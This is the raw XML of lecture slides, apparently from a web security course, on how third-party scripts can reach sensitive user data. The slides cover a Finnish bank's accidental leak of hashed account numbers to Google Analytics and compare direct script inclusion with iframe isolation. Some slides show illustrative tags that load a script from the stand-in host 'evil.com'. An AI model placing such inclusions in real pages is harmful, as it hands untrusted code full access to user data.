                  <a:pt x="2491043" y="0"/>
                  <a:pt x="2491043" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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Bildobjekt 33" descr="imgres.jpg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209" y="4703260"/>
            <a:ext cx="502123" cy="50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1" name="Rak 40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4498631" y="1808610"/>
            <a:ext cx="0" cy="46279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Bildobjekt 28" descr="search.png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209" y="4112988"/>
            <a:ext cx="504000" cy="50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Frihandsfigur 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5496161" y="4287292"/>
            <a:ext cx="1155975" cy="595363"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1155975"/>
              <a:gd name="connsiteY0" fmla="*/ 58039 h 595363"/>
              <a:gd name="connsiteX1" fmla="*/ 1155974 w 1155975"/>
              <a:gd name="connsiteY1" fmla="*/ 49898 h 595363"/>
              <a:gd name="connsiteX2" fmla="*/ 8141 w 1155975"/>
              <a:gd name="connsiteY2" fmla="*/ 595363 h 595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5975" h="595363">
                <a:moveTo>
                  <a:pt x="0" y="58039"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="577308" y="9191"/>
                  <a:pt x="1154617" y="-39656"/>
                  <a:pt x="1155974" y="49898"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1157331" y="139452"/>
                  <a:pt x="8141" y="595363"/>
                  <a:pt x="8141" y="595363"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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latshållare för innehåll 38"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460031" y="1718468"/>
            <a:ext cx="4038600" cy="4718131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What happens when a user enters sensitive data into a web application?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Consider when the user logs in into a system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How can we guarantee that the credentials are only sent back to the 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> party and are not stolen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… by another user abusing flaws in the system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… or accidentally disclosed?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7" name="Frihandsfigur 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5522572" y="4263525"/>
            <a:ext cx="1277367" cy="1457017"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1277367"/>
              <a:gd name="connsiteY0" fmla="*/ 89284 h 1457017"/>
              <a:gd name="connsiteX1" fmla="*/ 1172255 w 1277367"/>
              <a:gd name="connsiteY1" fmla="*/ 146273 h 1457017"/>
              <a:gd name="connsiteX2" fmla="*/ 1147833 w 1277367"/>
              <a:gd name="connsiteY2" fmla="*/ 1457017 h 1457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7367" h="1457017">
                <a:moveTo>
                  <a:pt x="0" y="89284"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="490475" y="3800"/>
                  <a:pt x="980950" y="-81683"/>
                  <a:pt x="1172255" y="146273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1363561" y="374229"/>
                  <a:pt x="1255697" y="915623"/>
                  <a:pt x="1147833" y="1457017"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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25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0" grpId="0" animBg="1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 you trust the 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> party</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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accidental data leaks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777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Rak pil 30"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2226326" y="3937633"/>
            <a:ext cx="860770" cy="4194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Rak 37"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3840677" y="3535607"/>
            <a:ext cx="4672556" cy="9686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Rak 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3137943" y="4277400"/>
            <a:ext cx="2776024" cy="20048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Accidental data leaks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Bildobjekt 2" descr="imgres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813" y="2637511"/>
            <a:ext cx="800354" cy="80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Bildobjekt 15" descr="imgr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943" y="3535607"/>
            <a:ext cx="741793" cy="741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Bildobjekt 4" descr="j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400" y="3203483"/>
            <a:ext cx="664247" cy="664247"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Rak pil 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2787307" y="4328127"/>
            <a:ext cx="350636" cy="67953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Rak pil 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3378131" y="4401954"/>
            <a:ext cx="0" cy="49661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Frihandsfigur 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3777524" y="3030849"/>
            <a:ext cx="903613" cy="472194"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 903613 w 903613"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 472194"/>
              <a:gd name="connsiteX1" fmla="*/ 276782 w 903613"/>
              <a:gd name="connsiteY1" fmla="*/ 162826 h 472194"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 903613"/>
              <a:gd name="connsiteY2" fmla="*/ 472194 h 47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3613" h="472194">
                <a:moveTo>
                  <a:pt x="903613" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="665498" y="42063"/>
                  <a:pt x="427384" y="84127"/>
                  <a:pt x="276782" y="162826"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="126180" y="241525"/>
                  <a:pt x="0" y="472194"/>
                  <a:pt x="0" y="472194"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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Rak pil 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2018640" y="2772769"/>
            <a:ext cx="1133312" cy="97858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2" name="Bildobjekt 21" descr="imgres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136" y="2076223"/>
            <a:ext cx="800354" cy="80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Bildobjekt 17" descr="jQurery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8" y="2174829"/>
            <a:ext cx="462682" cy="462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Bildobjekt 18" descr="modernizr-sticker.jpg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3667" r="963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36" t="18638" r="4562" b="17732"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2809538" y="2174829"/>
            <a:ext cx="664624" cy="462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textruta 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333875" y="1794773"/>
            <a:ext cx="68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CDN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="textruta 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4599230" y="3370129"/>
            <a:ext cx="101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party</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="textruta 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3512788" y="23050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</a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="textruta 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3872937" y="508711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</a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Bildobjekt 29" descr="Screen Shot 2015-08-04 at 12.40.43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487" y="4401954"/>
            <a:ext cx="2948375" cy="2133692"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Bildobjekt 32" descr="images.jpg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889" b="89778" l="0" r="100000">
                        <a14:foregroundMark x1="61333" y1="40000" x2="61333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234" y="3032312"/>
            <a:ext cx="853661" cy="853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Bildobjekt 33" descr="Cloud-Hosting-4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234" y="1934576"/>
            <a:ext cx="831354" cy="831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6" name="Rak pil 35"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5506167" y="2472844"/>
            <a:ext cx="1232490" cy="29308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Rak pil 36"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5506167" y="2960664"/>
            <a:ext cx="1232490" cy="47036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Frihandsfigur 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2227589" y="3050399"/>
            <a:ext cx="4982086" cy="1060652"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4982086"/>
              <a:gd name="connsiteY0" fmla="*/ 927277 h 1060652"/>
              <a:gd name="connsiteX1" fmla="*/ 1188537 w 4982086"/>
              <a:gd name="connsiteY1" fmla="*/ 984266 h 1060652"/>
              <a:gd name="connsiteX2" fmla="*/ 2841092 w 4982086"/>
              <a:gd name="connsiteY2" fmla="*/ 15455 h 1060652"/>
              <a:gd name="connsiteX3" fmla="*/ 4982086 w 4982086"/>
              <a:gd name="connsiteY3" fmla="*/ 479507 h 1060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82086" h="1060652">
                <a:moveTo>
                  <a:pt x="0" y="927277"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="357511" y="1031756"/>
                  <a:pt x="715022" y="1136236"/>
                  <a:pt x="1188537" y="984266"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1662052" y="832296"/>
                  <a:pt x="2208834" y="99581"/>
                  <a:pt x="2841092" y="15455"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3473350" y="-68672"/>
                  <a:pt x="4227718" y="205417"/>
                  <a:pt x="4982086" y="479507"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="31750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Bildobjekt 41" descr="1366511188978779390free-red-cloud-advertising-md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730" y="5004140"/>
            <a:ext cx="676048" cy="676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Bildobjekt 42" descr="search.png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489" y="3673504"/>
            <a:ext cx="504000" cy="50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9" name="Frihandsfigur 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2226326" y="3921539"/>
            <a:ext cx="1302807" cy="1034986"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1302807"/>
              <a:gd name="connsiteY0" fmla="*/ 58034 h 1034986"/>
              <a:gd name="connsiteX1" fmla="*/ 1212959 w 1302807"/>
              <a:gd name="connsiteY1" fmla="*/ 106882 h 1034986"/>
              <a:gd name="connsiteX2" fmla="*/ 1212959 w 1302807"/>
              <a:gd name="connsiteY2" fmla="*/ 1034986 h 103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2807" h="1034986">
                <a:moveTo>
                  <a:pt x="0" y="58034"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="505399" y="1045"/>
                  <a:pt x="1010799" y="-55943"/>
                  <a:pt x="1212959" y="106882"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1415119" y="269707"/>
                  <a:pt x="1212959" y="1034986"/>
                  <a:pt x="1212959" y="1034986"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="FF0000"/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Bildobjekt 28" descr="analytics-icon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867" y="5007661"/>
            <a:ext cx="672527" cy="672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0461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 descr="Screen Shot 2015-08-05 at 16.52.2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2" t="2803" r="8972"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4088477" y="1930392"/>
            <a:ext cx="4825607" cy="3425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457200" y="1825758"/>
            <a:ext cx="3502122" cy="471830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Sensitive Data Exposure, vulnerability #6 on OWASP Top 10 – 2013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Finnish bank – included Google Analytics on all pages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Security concerns were raised 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The bank responded on Twitter that everything was fine – after all they had a business agreement with Google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S-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Pankki</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="textruta 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4600083" y="6267063"/>
            <a:ext cx="4314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twitter.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>S_Pankki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>/status/569878961209143296</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4278968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could possibly go wrong?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Bildobjekt 3" descr="Screen Shot 2015-07-15 at 15.28.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65" y="1921740"/>
            <a:ext cx="6891866" cy="4193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ruta 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="163273" y="6293082"/>
            <a:ext cx="408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oona.windytan.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pankki.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Vänster 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7191381" y="4445000"/>
            <a:ext cx="1435100" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="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undad rektangulär 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4406900" y="1727199"/>
            <a:ext cx="4355360" cy="800641"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -28414"/>
              <a:gd name="adj2" fmla="val 70431"/>
              <a:gd name="adj3" fmla="val 1666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 an unsalted SHA-1 of the user’s bank account number …</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rundad rektangulär 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1921740"/>
            <a:ext cx="2129367" cy="614373"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5781"/>
              <a:gd name="adj2" fmla="val 74566"/>
              <a:gd name="adj3" fmla="val 1666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Part of the URL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394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med rundade hörn 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="919467" y="4817678"/>
            <a:ext cx="6449932" cy="86934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ktangel med rundade hörn 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="919467" y="3249103"/>
            <a:ext cx="6449932" cy="44873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87222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Why could Google Analytics access the SHA-1 of the account number?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it was part of the URL – what else can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>oogle access?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Current inclusion mechanisms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Direct inclusion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marL="365760" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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  &lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>src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=“http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>evil.com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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>hack.hs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&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1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    gives same privileges to included script as scripts provided by the 1st party.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>frame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> inclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>iframe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&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>=“http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>hack.hs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&gt;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&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1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 &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>iframe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&gt;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</a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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</a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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 gives full isolation (can still communicate with origin, though)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can included scripts access?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585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innehåll 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380999" y="1719071"/>
            <a:ext cx="8407893" cy="4799112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When does a web page become a web app?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Web app or not?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a personal web page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newspaper, e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nytimes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online store, e.g., amazon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online auction, e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebay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social media, e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>facebook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social sharing, e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>imgur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online email, e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gmail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online office, e.g., office 365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online storage, e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dropbox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Without defining – can we identify some properties of web apps? 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 smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean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web application?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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10" b="98374" l="9559" r="94853">
                        <a14:foregroundMark x1="53309" y1="83469" x2="53309" y2="834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72724" y="2949451"/>
            <a:ext cx="1386890" cy="188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86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87222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Full </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>isolation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>too restrictive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> for the absolute majority of cases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Most require some kind of data exchange with including page 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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> party libraries like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jQuery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000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Modernizr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> would be rendered useless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Analytics monitors events on page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Contextual ads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…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Result: all scripts included at full privilege under full trust!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This is the pragmatic solution, albeit not necessarily the secure one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Google Analytics could access more than SHA-1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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>he leak was accidental, since SHA-1 included in URL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of page which is part of default data sent to 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Google Analytics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Had Google wanted they could have harvested all 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information available in the pages, where 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Google Analytics was included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can included scripts access?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Bildobjekt 3" descr="Large Metal Safe-400x4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607" y="4462993"/>
            <a:ext cx="2128306" cy="212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505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82142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Protect confidentiality of user data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against malicious attempts at obtaining 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against accidental leaks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User centric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User should not have to trust other users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User should not have to trust provider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User should not have to trust 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0">
